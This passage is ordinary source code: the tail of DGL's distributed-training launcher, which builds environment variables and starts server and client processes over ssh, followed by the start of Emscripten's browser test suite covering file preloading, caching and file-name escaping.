# python -m torch.distributed.launch [DIST TORCH ARGS] path/to/dist_trainer.py arg0 arg1
# Note: if there are multiple python commands in `udf_command`, this may do the Wrong Thing, eg launch each
# python command within the torch distributed launcher.
new_udf_command = udf_command.replace(python_bin, f"{python_bin} {torch_dist_cmd}")
return new_udf_command
def construct_dgl_server_env_vars(
num_samplers: int,
num_server_threads: int,
tot_num_clients: int,
part_config: str,
ip_config: str,
num_servers: int,
graph_format: str,
pythonpath: Optional[str] = "",
) -> str:
"""Constructs the DGL server-specific env vars string that are required for DGL code to behave in the correct
server role.
Convenience function.
Args:
num_samplers:
num_server_threads:
tot_num_clients:
part_config: Partition config.
Relative path to workspace.
ip_config: IP config file containing IP addresses of cluster hosts.
Relative path to workspace.
num_servers:
graph_format:
pythonpath: Optional. If given, this will pass this as PYTHONPATH.
Returns:
server_env_vars: The server-specific env-vars in a string format, friendly for CLI execution.
"""
server_env_vars_template = (
"DGL_ROLE={DGL_ROLE} "
"DGL_NUM_SAMPLER={DGL_NUM_SAMPLER} "
"OMP_NUM_THREADS={OMP_NUM_THREADS} "
"DGL_NUM_CLIENT={DGL_NUM_CLIENT} "
"DGL_CONF_PATH={DGL_CONF_PATH} "
"DGL_IP_CONFIG={DGL_IP_CONFIG} "
"DGL_NUM_SERVER={DGL_NUM_SERVER} "
"DGL_GRAPH_FORMAT={DGL_GRAPH_FORMAT} "
"{suffix_optional_envvars}"
)
suffix_optional_envvars = ""
if pythonpath:
suffix_optional_envvars += f"PYTHONPATH={pythonpath} "
return server_env_vars_template.format(
DGL_ROLE="server",
DGL_NUM_SAMPLER=num_samplers,
OMP_NUM_THREADS=num_server_threads,
DGL_NUM_CLIENT=tot_num_clients,
DGL_CONF_PATH=part_config,
DGL_IP_CONFIG=ip_config,
DGL_NUM_SERVER=num_servers,
DGL_GRAPH_FORMAT=graph_format,
suffix_optional_envvars=suffix_optional_envvars,
)
def construct_dgl_client_env_vars(
num_samplers: int,
tot_num_clients: int,
part_config: str,
ip_config: str,
num_servers: int,
graph_format: str,
num_omp_threads: int,
pythonpath: Optional[str] = "",
) -> str:
"""Constructs the DGL client-specific env vars string that are required for DGL code to behave in the correct
client role.
Convenience function.
Args:
num_samplers:
tot_num_clients:
part_config: Partition config.
Relative path to workspace.
ip_config: IP config file containing IP addresses of cluster hosts.
Relative path to workspace.
num_servers:
graph_format:
num_omp_threads:
pythonpath: Optional. If given, this will pass this as PYTHONPATH.
Returns:
client_env_vars: The client-specific env-vars in a string format, friendly for CLI execution.
"""
client_env_vars_template = (
"DGL_DIST_MODE={DGL_DIST_MODE} "
"DGL_ROLE={DGL_ROLE} "
"DGL_NUM_SAMPLER={DGL_NUM_SAMPLER} "
"DGL_NUM_CLIENT={DGL_NUM_CLIENT} "
"DGL_CONF_PATH={DGL_CONF_PATH} "
"DGL_IP_CONFIG={DGL_IP_CONFIG} "
"DGL_NUM_SERVER={DGL_NUM_SERVER} "
"DGL_GRAPH_FORMAT={DGL_GRAPH_FORMAT} "
"OMP_NUM_THREADS={OMP_NUM_THREADS} "
"{suffix_optional_envvars}"
)
# append optional additional env-vars
suffix_optional_envvars = ""
if pythonpath:
suffix_optional_envvars += f"PYTHONPATH={pythonpath} "
return client_env_vars_template.format(
DGL_DIST_MODE="distributed",
DGL_ROLE="client",
DGL_NUM_SAMPLER=num_samplers,
DGL_NUM_CLIENT=tot_num_clients,
DGL_CONF_PATH=part_config,
DGL_IP_CONFIG=ip_config,
DGL_NUM_SERVER=num_servers,
DGL_GRAPH_FORMAT=graph_format,
OMP_NUM_THREADS=num_omp_threads,
suffix_optional_envvars=suffix_optional_envvars,
)
def wrap_cmd_with_local_envvars(cmd: str, env_vars: str) -> str:
"""Wraps a CLI command with desired env vars with the following properties:
(1) env vars persist for the entire `cmd`, even if it consists of multiple "chained" commands like:
cmd = "ls && pwd && python run/something.py"
(2) env vars don't pollute the environment after `cmd` completes.
Example:
>>> cmd = "ls && pwd"
>>> env_vars = "VAR1=value1 VAR2=value2"
>>> wrap_cmd_with_local_envvars(cmd, env_vars)
"(export VAR1=value1 VAR2=value2; ls && pwd)"
Args:
cmd:
env_vars: A string containing env vars, eg "VAR1=val1 VAR2=val2"
Returns:
cmd_with_env_vars:
"""
# use `export` to persist env vars for entire cmd block. required if udf_command is a chain of commands
# also: wrap in parens to not pollute env:
# https://stackoverflow.com/a/45993803
return f"(export {env_vars}; {cmd})"
def wrap_cmd_with_extra_envvars(cmd: str, env_vars: list) -> str:
"""Wraps a CLI command with extra env vars
Example:
>>> cmd = "ls && pwd"
>>> env_vars = ["VAR1=value1", "VAR2=value2"]
>>> wrap_cmd_with_extra_envvars(cmd, env_vars)
"(export VAR1=value1 VAR2=value2; ls && pwd)"
Args:
cmd:
env_vars: A list of strings containing env vars, e.g., ["VAR1=value1", "VAR2=value2"]
Returns:
cmd_with_env_vars:
"""
env_vars = " ".join(env_vars)
return wrap_cmd_with_local_envvars(cmd, env_vars)
def submit_jobs(args, udf_command):
"""Submit distributed jobs (server and client processes) via ssh"""
hosts = []
thread_list = []
server_count_per_machine = 0
# Get the IP addresses of the cluster.
ip_config = os.path.join(args.workspace, args.ip_config)
with open(ip_config) as f:
for line in f:
result = line.strip().split()
if len(result) == 2:
ip = result[0]
port = int(result[1])
hosts.append((ip, port))
elif len(result) == 1:
ip = result[0]
port = DEFAULT_PORT
hosts.append((ip, port))
else:
raise RuntimeError("Format error of ip_config.")
server_count_per_machine = args.num_servers
# Get partition info of the graph data
part_config = os.path.join(args.workspace, args.part_config)
with open(part_config) as conf_f:
part_metadata = json.load(conf_f)
assert 'num_parts' in part_metadata, 'num_parts does not exist.'
# The number of partitions must match the number of machines in the cluster.
assert part_metadata['num_parts'] == len(hosts), \
'The number of graph partitions has to match the number of machines in the cluster.'
tot_num_clients = args.num_trainers * (1 + args.num_samplers) * len(hosts)
# launch server tasks
server_env_vars = construct_dgl_server_env_vars(
num_samplers=args.num_samplers,
num_server_threads=args.num_server_threads,
tot_num_clients=tot_num_clients,
part_config=args.part_config,
ip_config=args.ip_config,
num_servers=args.num_servers,
graph_format=args.graph_format,
pythonpath=os.environ.get("PYTHONPATH", ""),
)
for i in range(len(hosts) * server_count_per_machine):
ip, _ = hosts[int(i / server_count_per_machine)]
server_env_vars_cur = f"{server_env_vars} DGL_SERVER_ID={i}"
cmd = wrap_cmd_with_local_envvars(udf_command, server_env_vars_cur)
cmd = wrap_cmd_with_extra_envvars(cmd, args.extra_envs) if len(args.extra_envs) > 0 else cmd
cmd = 'cd ' + str(args.workspace) + '; ' + cmd
thread_list.append(execute_remote(cmd, ip, args.ssh_port, username=args.ssh_username))
# launch client tasks
client_env_vars = construct_dgl_client_env_vars(
num_samplers=args.num_samplers,
tot_num_clients=tot_num_clients,
part_config=args.part_config,
ip_config=args.ip_config,
num_servers=args.num_servers,
graph_format=args.graph_format,
num_omp_threads=os.environ.get("OMP_NUM_THREADS", str(args.num_omp_threads)),
pythonpath=os.environ.get("PYTHONPATH", ""),
)
for node_id, host in enumerate(hosts):
ip, _ = host
# Transform udf_command to follow torch's dist launcher format: `PYTHON_BIN -m torch.distributed.launch ... UDF`
torch_dist_udf_command = wrap_udf_in_torch_dist_launcher(
udf_command=udf_command,
num_trainers=args.num_trainers,
num_nodes=len(hosts),
node_rank=node_id,
master_addr=hosts[0][0],
master_port=1234,
)
cmd = wrap_cmd_with_local_envvars(torch_dist_udf_command, client_env_vars)
cmd = wrap_cmd_with_extra_envvars(cmd, args.extra_envs) if len(args.extra_envs) > 0 else cmd
cmd = 'cd ' + str(args.workspace) + '; ' + cmd
thread_list.append(execute_remote(cmd, ip, args.ssh_port, username=args.ssh_username))
# Start a cleanup process dedicated for cleaning up remote training jobs.
conn1,conn2 = multiprocessing.Pipe()
func = partial(get_all_remote_pids, hosts, args.ssh_port, udf_command)
process = multiprocessing.Process(target=cleanup_proc, args=(func, conn1))
process.start()
def signal_handler(signal, frame):
logging.info('Stop launcher')
# We need to tell the cleanup process to kill remote training jobs.
conn2.send('cleanup')
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
for thread in thread_list:
thread.join()
# The training processes complete. We should tell the cleanup process to exit.
conn2.send('exit')
process.join()
def main():
print("hello")
parser = argparse.ArgumentParser(description='Launch a distributed job')
parser.add_argument('--ssh_port', type=int, default=22, help='SSH Port.')
parser.add_argument(
"--ssh_username", default="",
help="Optional. When issuing commands (via ssh) to cluster, use the provided username in the ssh cmd. "
"Example: If you provide --ssh_username=bob, then the ssh command will be like: 'ssh bob@1.2.3.4 CMD' "
"instead of 'ssh 1.2.3.4 CMD'"
)
parser.add_argument('--workspace', type=str,
help='Path of user directory of distributed tasks. \
This is used to specify a destination location where \
the contents of current directory will be rsyncd')
parser.add_argument('--num_trainers', type=int,
help='The number of trainer processes per machine')
parser.add_argument('--num_omp_threads', type=int,
help='The number of OMP threads per trainer')
parser.add_argument('--num_samplers', type=int, default=0,
help='The number of sampler processes per trainer process')
parser.add_argument('--num_servers', type=int,
help='The number of server processes per machine')
parser.add_argument('--part_config', type=str,
help='The file (in workspace) of the partition config')
parser.add_argument('--ip_config', type=str,
help='The file (in workspace) of IP configuration for server processes')
parser.add_argument('--num_server_threads', type=int, default=1,
help='The number of OMP threads in the server process. \
It should be small if server processes and trainer processes run on \
the same machine. By default, it is 1.')
parser.add_argument('--graph_format', type=str, default='csc',
help='The format of the graph structure of each partition. \
The allowed formats are csr, csc and coo. A user can specify multiple \
formats, separated by ",". For example, the graph format is "csr,csc".')
parser.add_argument('--extra_envs', nargs='+', type=str, default=[],
help='Extra environment parameters need to be set. For example, \
you can set the LD_LIBRARY_PATH and NCCL_DEBUG by adding: \
--extra_envs LD_LIBRARY_PATH=/usr/local/cuda/lib64:$LD_LIBRARY_PATH NCCL_DEBUG=INFO ')
args, udf_command = parser.parse_known_args()
assert len(udf_command) == 1, 'Please provide user command line.'
assert args.num_trainers is not None and args.num_trainers > 0, \
'--num_trainers must be a positive number.'
assert args.num_samplers is not None and args.num_samplers >= 0, \
'--num_samplers must be a non-negative number.'
assert args.num_servers is not None and args.num_servers > 0, \
'--num_servers must be a positive number.'
assert args.num_server_threads > 0, '--num_server_threads must be a positive number.'
assert args.workspace is not None, 'A user has to specify a workspace with --workspace.'
assert args.part_config is not None, \
'A user has to specify a partition configuration file with --part_config.'
assert args.ip_config is not None, \
'A user has to specify an IP configuration file with --ip_config.'
if args.num_omp_threads is None:
# Here we assume all machines have the same number of CPU cores as the machine
# where the launch script runs.
args.num_omp_threads = max(multiprocessing.cpu_count() // 2 // args.num_trainers, 1)
print('The number of OMP threads per trainer is set to', args.num_omp_threads)
udf_command = str(udf_command[0])
if 'python' not in udf_command:
raise RuntimeError("DGL launching script can only support Python executable file.")
submit_jobs(args, udf_command)
if __name__ == '__main__':
fmt = '%(asctime)s %(levelname)s %(message)s'
logging.basicConfig(format=fmt, level=logging.INFO)
main()
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from runner import BrowserCore, path_from_root, has_browser, EMTEST_BROWSER, no_wasm_backend, flaky, create_test_file
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE, SPIDERMONKEY_ENGINE, JS_ENGINES
from tools.shared import try_delete, Building, run_process, run_js
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
def decorated(self):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
# FIXME when the wasm backend gets threads
if is_chrome() and self.is_wasm_backend():
self.skipTest('wasm backend lacks threads')
return f(self)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
class browser(BrowserCore):
@classmethod
def setUpClass(self):
super(browser, self).setUpClass()
self.browser_timeout = 20
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
@no_wasm_backend('wasm source maps')
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4', '-s', 'WASM=0'])
self.assertExists(html_file)
self.assertExists(html_file + '.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
@no_wasm_backend('wasm source maps')
def test_emscripten_log(self):
# TODO: wasm support for source maps
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
self.compile_btest([src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1', '-s', 'WASM=0'])
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK):
return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
# On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
if WINDOWS and Building.which('mingw32-make'):
run_process(['doit.bat'])
else:
run_process(['sh', './doit.sh'])
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
os.makedirs('assets/sub/asset1/'.replace('\\', '/'))
os.makedirs('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir('dirrey')
except:
pass
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
create_test_file('src.cpp', self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
create_test_file('file.txt', '''Hello!''')
self.compile_btest(['src.cpp', '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except:
pass
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
run_process([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt'))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path))
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
run_process([PYTHON, FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
os.makedirs(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
'''))
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
self.clear()
os.makedirs('subdirr')
